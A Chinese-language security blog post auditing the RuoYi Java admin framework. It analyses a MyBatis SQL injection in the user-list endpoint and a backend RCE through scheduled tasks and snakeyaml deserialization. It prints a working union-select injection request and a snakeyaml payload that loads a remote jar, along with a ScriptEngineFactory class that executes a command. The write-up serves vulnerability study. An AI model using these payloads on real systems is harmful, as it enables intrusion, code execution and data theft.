<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="若依系统代码审计"><meta name="keywords" content="java审计"><meta name="author" content="Aizlm,zhikalingm@gmail.com"><meta name="copyright" content="Aizlm"><title>若依系统代码审计 | Aizlm</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.9.1"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.9.1"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: undefined,
  localSearch: undefined,
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  },
  hexoVersion: '6.3.0'
} </script><meta name="generator" content="Hexo 6.3.0"></head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="true"><div class="toggle-sidebar-info text-center"><span data-toggle="Toggle article">Toggle site</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Ruoyi%E7%B3%BB%E7%BB%9F%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1"><span class="toc-number">1.</span> <span class="toc-text">Ruoyi系统代码审计</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#Mybatis-sql%E6%B3%A8%E5%85%A5-lt-x3D-4-6-1"><span class="toc-number">1.1.</span> <span class="toc-text">Mybatis sql注入 &lt;&#x3D;4.6.1</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AF%BB%E6%89%BE%E6%BC%8F%E6%B4%9E%E7%82%B9"><span class="toc-number">1.1.1.</span> <span class="toc-text">寻找漏洞点</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%B3%A8%E5%85%A5"><span class="toc-number">1.1.2.</span> <span class="toc-text">注入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#payload%E7%BC%96%E5%86%99"><span class="toc-number">1.1.3.</span> <span class="toc-text">payload编写</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%90%8E%E5%8F%B0RCE-lt-4-6-2"><span class="toc-number">1.2.</span> <span class="toc-text">后台RCE &lt;4.6.2</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%9A%E6%97%B6%E4%BB%BB%E5%8A%A1%E8%B0%83%E5%BA%A6%E6%B5%81%E7%A8%8B"><span class="toc-number">1.2.1.</span> <span class="toc-text">定时任务调度流程</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90"><span class="toc-number">1.2.2.</span> <span class="toc-text">漏洞分析</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%80%BB%E7%BB%93%EF%BC%9A"><span class="toc-number">1.2.3.</span> <span class="toc-text">总结：</span></a></li></ol></li></ol></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="/img/avatar.png"></div><div class="author-info__name text-center">Aizlm</div><div class="author-info__description text-center">早日退休！</div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">Articles</span><span class="pull-right">8</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">Tags</span><span class="pull-right">5</span></a></div></div></div><div id="content-outer"><div class="no-bg" id="top-container"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">Aizlm</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">Home</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/tags">Tags</a></span><span class="pull-right"></span></div><div id="post-info"><div id="post-title">若依系统代码审计</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2023-02-28</time></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><h1 id="Ruoyi系统代码审计"><a href="#Ruoyi系统代码审计" class="headerlink" title="Ruoyi系统代码审计"></a>Ruoyi系统代码审计</h1><h2 id="Mybatis-sql注入-lt-x3D-4-6-1"><a href="#Mybatis-sql注入-lt-x3D-4-6-1" class="headerlink" title="Mybatis sql注入 &lt;&#x3D;4.6.1"></a>Mybatis sql注入 &lt;&#x3D;4.6.1</h2><ol>
<li>漏洞成因：在mybatis中，<code>#</code>进行预编译，<code>$</code>是直接拼接，会导致sql注入出现</li>
</ol>
<h3 id="寻找漏洞点"><a href="#寻找漏洞点" class="headerlink" title="寻找漏洞点"></a>寻找漏洞点</h3><ol>
<li><p>application.yaml配置了mybatis的sql配置在各模块的mapper下</p>
<img src="/2023/02/28/%E8%8B%A5%E4%BE%9D%E7%B3%BB%E7%BB%9F%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20230228141512587.png" alt="image-20230228141512587" style="zoom:80%;">
</li>
<li><p>直接遍历所有模块的mapper，查看特征是否有<code>$</code></p>
<p>- </p>
<img src="/2023/02/28/%E8%8B%A5%E4%BE%9D%E7%B3%BB%E7%BB%9F%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20230228141641823.png" alt="image-20230228141641823" style="zoom:80%;">

<img src="/2023/02/28/%E8%8B%A5%E4%BE%9D%E7%B3%BB%E7%BB%9F%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20230228141656121.png" alt="image-20230228141656121" style="zoom:80%;">

<ul>
<li>src&#x2F;main&#x2F;resources&#x2F;mapper&#x2F;system&#x2F;SysRoleMapper.xml</li>
</ul>
<img src="/2023/02/28/%E8%8B%A5%E4%BE%9D%E7%B3%BB%E7%BB%9F%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20230228141733021.png" alt="image-20230228141733021" style="zoom: 67%;">

<ul>
<li><p>src&#x2F;main&#x2F;resources&#x2F;mapper&#x2F;system&#x2F;SysUserMapper.xml</p>
<img src="/2023/02/28/%E8%8B%A5%E4%BE%9D%E7%B3%BB%E7%BB%9F%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20230228141932168.png" alt="image-20230228141932168" style="zoom: 67%;">

<img src="/2023/02/28/%E8%8B%A5%E4%BE%9D%E7%B3%BB%E7%BB%9F%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20230228142020220.png" alt="image-20230228142020220" style="zoom: 80%;">

<p><img src="/2023/02/28/%E8%8B%A5%E4%BE%9D%E7%B3%BB%E7%BB%9F%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20230228142040517.png" alt="image-20230228142040517"><img src="/2023/02/28/%E8%8B%A5%E4%BE%9D%E7%B3%BB%E7%BB%9F%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20230228142020220.png" alt="image-20230228142020220" style="zoom: 80%;"></p>
<p><img src="/2023/02/28/%E8%8B%A5%E4%BE%9D%E7%B3%BB%E7%BB%9F%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/%E8%8B%A5%E4%BE%9D%E7%B3%BB%E7%BB%9F%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%5Cimage-20230228142040517.png" alt="image-20230228142040517"></p>
</li>
</ul>
</li>
</ol>
<h3 id="注入"><a href="#注入" class="headerlink" title="注入"></a>注入</h3><ol>
<li><p>select型注入，直接拿了个src&#x2F;main&#x2F;resources&#x2F;mapper&#x2F;system&#x2F;SysUserMapper.xml的selectUserList进行注入</p>
<img src="/2023/02/28/%E8%8B%A5%E4%BE%9D%E7%B3%BB%E7%BB%9F%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20230228144336457.png" alt="image-20230228144336457" style="zoom:80%;">

<p>查找调用链，最终找到地址<code>/system/user/list</code>，并且对传入的params数组并没有做任何的过滤，查询有回显，可以直接使用union注入就好了：</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//反找mapper-&gt;impl-&gt;service-&gt;controller</span></span><br><span class="line">com.ruoyi.system.mapper.SysUserMapper#selectUserList--&gt;; <span class="comment">//mapper</span></span><br><span class="line">com.ruoyi.system.service.ISysUserService#selectUserList--&gt;; <span class="comment">//service</span></span><br><span class="line">com.ruoyi.web.controller.system.SysUserController#list--&gt;; <span class="comment">//找到目标controller</span></span><br><span class="line"><span class="keyword">public</span> TableDataInfo <span class="title function_">list</span><span class="params">(SysUser user)</span></span><br><span class="line">&#123;</span><br><span class="line">    startPage();</span><br><span class="line">    List&lt;SysUser&gt; list = userService.selectUserList(user);</span><br><span class="line">    <span class="keyword">return</span> getDataTable(list);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li>
</ol>
<h3 id="payload编写"><a href="#payload编写" class="headerlink" title="payload编写"></a>payload编写</h3><ul>
<li><p>poc:</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">pageSize=10&amp;pageNum=1&amp;orderByColumn=createTime&amp;isAsc=desc&amp;deptId=&amp;parentId=&amp;loginName=-1&amp;phonenumber=&amp;status=&amp;params%5BbeginTime%5D=&amp;params%5BendTime%5D=&amp;params%5BdataScope%5D=union select (select database()),2,3,4,5,6,7,8,9,10,11,12,13,14,&quot;2023-02-28 14:36:50&quot;,16,&quot;2023-02-28 14:36:50&quot;,18,19,20</span><br></pre></td></tr></table></figure>

<p>注入的点是params.dataScope，对应的15，17号位置是Date类型，且格式是<code>@Excel(name = &quot;最后登录时间&quot;, width = 30, dateFormat = &quot;yyyy-MM-dd HH:mm:ss&quot;, type = Type.EXPORT)</code>：</p>
<img src="/2023/02/28/%E8%8B%A5%E4%BE%9D%E7%B3%BB%E7%BB%9F%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20230228145401904.png" alt="image-20230228145401904">
</li>
<li><p>结果：有前端类型验证，但还是爆出来了，或者用其他的字段</p>
<img src="/2023/02/28/%E8%8B%A5%E4%BE%9D%E7%B3%BB%E7%BB%9F%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20230228145814855.png" alt="image-20230228145814855">

<img src="/2023/02/28/%E8%8B%A5%E4%BE%9D%E7%B3%BB%E7%BB%9F%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20230228145931411.png" alt="image-20230228145931411"></li>
</ul>
<h2 id="后台RCE-lt-4-6-2"><a href="#后台RCE-lt-4-6-2" class="headerlink" title="后台RCE &lt;4.6.2"></a>后台RCE &lt;4.6.2</h2><h3 id="定时任务调度流程"><a href="#定时任务调度流程" class="headerlink" title="定时任务调度流程"></a>定时任务调度流程</h3><ul>
<li>Ruoyi：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/liutiaotiao/p/14078223.html">https://www.cnblogs.com/liutiaotiao/p/14078223.html</a></li>
<li>漏洞参考链接：<a target="_blank" rel="noopener" href="http://myblog.ac.cn/archives/%E8%8B%A5%E4%BE%9D%E5%90%8E%E5%8F%B0rce%E5%88%B0snakeyaml%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96">http://myblog.ac.cn/archives/%E8%8B%A5%E4%BE%9D%E5%90%8E%E5%8F%B0rce%E5%88%B0snakeyaml%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96</a></li>
</ul>
<h3 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h3><ul>
<li><p>payload：</p>
<ul>
<li><p><code>org.yaml.snakeyaml.Yaml.load(&#39;!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL [&quot;http://127.0.0.1:8989/yaml-payload.jar&quot;]]]]&#39;)</code></p>
</li>
<li><pre><code class="java">public class AwesomeScriptEngineFactory implements ScriptEngineFactory &#123;
    public AwesomeScriptEngineFactory() &#123;
        try &#123;
            Runtime.getRuntime().exec(&quot;calc&quot;);
//            Runtime.getRuntime().exec(&quot;/Applications/Calculator.app/Contents/MacOS/Calculator&quot;);
        &#125; catch (IOException e) &#123;
            e.printStackTrace();
        &#125;
    &#125;
    ...
&#125;

//创建classpath:META-INF/services/javax.script.ScriptEngineFactory
//写入:artsploit.AwesomeScriptEngineFactory
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">1. 漏洞点，首先按照上面开发流程分析的过程，找到定时任务流程的起点`Job.execute()`方法，一直调用到invokeMethod，或者也能通过写入错误的类爆出异常，调用栈的信息看到关键函数。</span><br><span class="line"></span><br><span class="line">   &lt;img src=&quot;./若依系统代码审计/image-20230228203222784.png&quot; alt=&quot;image-20230228203222784&quot;  /&gt;</span><br><span class="line"></span><br><span class="line">2. 调用链：</span><br><span class="line"></span><br><span class="line">   ```java</span><br><span class="line">   //rce漏洞成因分析，如果是bean容器中的名字就直接获取bean，反射调用方法；否则实例化全类名对应的对象，反射调用方法</span><br><span class="line">   com.ruoyi.quartz.util.JobInvokeUtil#invokeMethod(com.ruoyi.quartz.domain.SysJob)--&gt;;</span><br><span class="line">   if (!isValidClassName(beanName))</span><br><span class="line">       //判断是否是bean容器中的</span><br><span class="line">   &#123;</span><br><span class="line">       Object bean = SpringUtils.getBean(beanName);</span><br><span class="line">       invokeMethod(bean, methodName, methodParams);</span><br><span class="line">   &#125;</span><br><span class="line">   else //如果不是，是全类名的话，利用Class反射加载类，有两个条件：1)类有无参构造器、2)public</span><br><span class="line">   &#123;</span><br><span class="line">       Object bean = Class.forName(beanName).newInstance();</span><br><span class="line">       invokeMethod(bean, methodName, methodParams);</span><br><span class="line">   &#125;</span><br><span class="line">   </span><br><span class="line">   //snakeyaml漏洞成因分析，通过反射生成构造器，通过递归的方式生成成员属性，最后进行实例化return c.newInstance(argumentListx);</span><br><span class="line">   org.yaml.snakeyaml.Yaml#load(java.lang.String)--&gt;;</span><br><span class="line">   org.yaml.snakeyaml.Yaml#loadFromReader--&gt;;</span><br><span class="line">   org.yaml.snakeyaml.constructor.BaseConstructor#getSingleData--&gt;;</span><br><span class="line">   org.yaml.snakeyaml.constructor.BaseConstructor#constructDocument--&gt;;</span><br><span class="line">   org.yaml.snakeyaml.constructor.BaseConstructor#constructObject--&gt;;</span><br><span class="line">   org.yaml.snakeyaml.constructor.BaseConstructor#constructObjectNoCheck--&gt;;</span><br><span class="line">   org.yaml.snakeyaml.constructor.Construct#construct--&gt;;</span><br><span class="line">   org.yaml.snakeyaml.constructor.Construct#construct--&gt;;</span><br></pre></td></tr></table></figure>
</code></pre>
</li>
</ul>
 <img src="/2023/02/28/%E8%8B%A5%E4%BE%9D%E7%B3%BB%E7%BB%9F%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20230301100133494.png" alt="image-20230301100133494"></li>
</ul>
<ol start="3">
<li><p>反序列化完之后，没有出现预期的效果，说明是在<code>javax.script.ScriptEngineManager</code>的<code>newInstance</code>进行构造的过程中触发的RCE。</p>
<ol>
<li><p>SPI机制</p>
<p>全称为 Service Provider Interface，是一种服务发现机制。它通过在ClassPath路径下的META-INF&#x2F;services文件夹查找文件，<strong>自动加载文件里所定义的类</strong>。</p>
<img src="/2023/02/28/%E8%8B%A5%E4%BE%9D%E7%B3%BB%E7%BB%9F%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20230301103921522.png" alt="image-20230301103921522" style="zoom:80%;">
</li>
<li><p>服务查找，匹配，并实例化</p>
<img src="/2023/02/28/%E8%8B%A5%E4%BE%9D%E7%B3%BB%E7%BB%9F%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20230301104219344.png" alt="image-20230301104219344">

<img src="/2023/02/28/%E8%8B%A5%E4%BE%9D%E7%B3%BB%E7%BB%9F%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20230301104643998.png" alt="image-20230301104643998">

<ol start="3">
<li><p>snakeyaml和ScriptEngineManager的漏洞链</p>
<img src="/2023/02/28/%E8%8B%A5%E4%BE%9D%E7%B3%BB%E7%BB%9F%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/image-20230301105053508.png" alt="image-20230301105053508" style="zoom:80%;"></li>
</ol>
</li>
</ol>
</li>
</ol>
<h3 id="总结："><a href="#总结：" class="headerlink" title="总结："></a>总结：</h3>   <figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">1. ruoyi框架Quartz层面调用的invokeMethod调用目标字符串通过反射进行实例化</span><br><span class="line">2. snakeyaml反射生成实例结合ScriptEngineManager，这里主要是因为可控的因素有：</span><br><span class="line">   	 1&gt;snakeyaml的load方法参数，并且没有判断是否有使用rmi、http、ldap之类的字样，</span><br><span class="line">   	 2&gt;ScriptEngineManager的服务加载类名，</span><br><span class="line">  	 3&gt;目标服务出网获取需要加载的恶意类</span><br></pre></td></tr></table></figure>

</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:zhikalingm@gmail.com">Aizlm</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="https://aizlm.github.io/2023/02/28/若依系统代码审计/">https://aizlm.github.io/2023/02/28/若依系统代码审计/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/java%E5%AE%A1%E8%AE%A1/">java审计</a></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2023/04/16/%E5%B8%B8%E8%A7%81%E6%BC%8F%E6%B4%9E%E5%AE%A1%E8%AE%A1/"><i class="fa fa-chevron-left">  </i><span>常见漏洞审计</span></a></div><div class="next-post pull-right"><a href="/2023/02/12/VulnStack/"><span>VulnStack</span><i class="fa fa-chevron-right"></i></a></div></nav></div></div><footer><div class="layout" id="footer"><div class="copyright">&copy;2013 - 2023 By Aizlm</div><div class="framework-info"><span>Driven - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>Theme - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/lib/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.9.1"></script><script src="/js/fancybox.js?version=1.9.1"></script><script src="/js/sidebar.js?version=1.9.1"></script><script src="/js/copy.js?version=1.9.1"></script><script src="/js/fireworks.js?version=1.9.1"></script><script src="/js/transition.js?version=1.9.1"></script><script src="/js/scroll.js?version=1.9.1"></script><script src="/js/head.js?version=1.9.1"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script></body></html>